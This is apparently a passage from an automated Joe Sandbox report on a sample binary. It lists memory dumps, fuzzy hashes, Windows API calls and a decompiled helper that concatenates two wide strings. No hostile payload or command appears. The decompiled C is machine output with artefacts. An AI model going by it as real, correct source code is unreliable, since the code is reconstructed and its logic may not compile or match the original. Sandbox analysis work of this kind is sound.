            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: 5c1a1bc83f1cee53aefe2146e8adf470f3e6f3760e34b92a42aca016f0d952d2
            • Instruction ID: 00adfb303a0fcdf1d8dc30e2161f587dbe1245c679021d2d9651750d85c93891
            • Opcode Fuzzy Hash: 5c1a1bc83f1cee53aefe2146e8adf470f3e6f3760e34b92a42aca016f0d952d2
            • Instruction Fuzzy Hash: 8721D872506299EBCB115F76CC48B9F7FBCDF0D350B148054F9059B202D639DA41C7A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				void* _v8;
            				void* _t18;
            				int _t25;
            				int _t29;
            				int _t34;
            
            				_t29 = lstrlenW(_a4);
            				_t25 = lstrlenW(_a8);
            				_t18 = E007E33DC(_t25 + _t29 + _t25 + _t29 + 2);
            				_v8 = _t18;
            				if(_t18 != 0) {
            					_t34 = _t29 + _t29;
            					memcpy(_t18, _a4, _t34);
            					_t10 = _t25 + 2; // 0x2
            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
            				}
            				return _v8;
            			}

            • Instruction Addresses: 0x007e5df9, 0x007e5dfd, 0x007e5e07, 0x007e5e0c, 0x007e5e11, 0x007e5e13, 0x007e5e1b, 0x007e5e20, 0x007e5e2e, 0x007e5e33, 0x007e5e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,02F19270,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5DF4
            • lstrlenW.KERNEL32(007E52D0,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5DFB
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • memcpy.NTDLL(00000000,004F0053,74CB69A0,?,?,007E52D0,004F0053,02F19270,?,?,?,?,?,?,007E68B6), ref: 007E5E1B
            • memcpy.NTDLL(74CB69A0,007E52D0,00000002,00000000,004F0053,74CB69A0,?,?,007E52D0,004F0053,02F19270), ref: 007E5E2E
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 7f4b30aa0ee847fe91ea79d412471542d62ccae12830c1fc0cd2ebb61a727460
            • Instruction ID: 5c8b607cd72c865037e3f519467e636a8d4e6f8e8eba7fbc09909a669c8d32d7
            • Opcode Fuzzy Hash: 7f4b30aa0ee847fe91ea79d412471542d62ccae12830c1fc0cd2ebb61a727460
            • Instruction Fuzzy Hash: 50F03C3290111DFB8F119FA9CC89C8E7BADEF082547114062F90497101E635EA108BA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
            • lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
            • lstrcat.KERNEL32(00000000,?), ref: 007E759A
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
            • API String ID: 74227042-0
            • Opcode ID: 9c99baa2e023fc1b10bed6eea3d67a926d8a490be52cd7006b708c5f20bf5040
            • Instruction ID: 3e0b275469be210bb8b11bf0f360fd9d03c790c4cc9a1acb8ab82ebbdc57c135
            • Opcode Fuzzy Hash: 9c99baa2e023fc1b10bed6eea3d67a926d8a490be52cd7006b708c5f20bf5040
            • Instruction Fuzzy Hash: 87E092735036A1AB8711ABA9AC8CC6FBBACFF8D660304441AF700D7110D739D901CBA9
            Uniqueness

            Uniqueness Score: -1.00%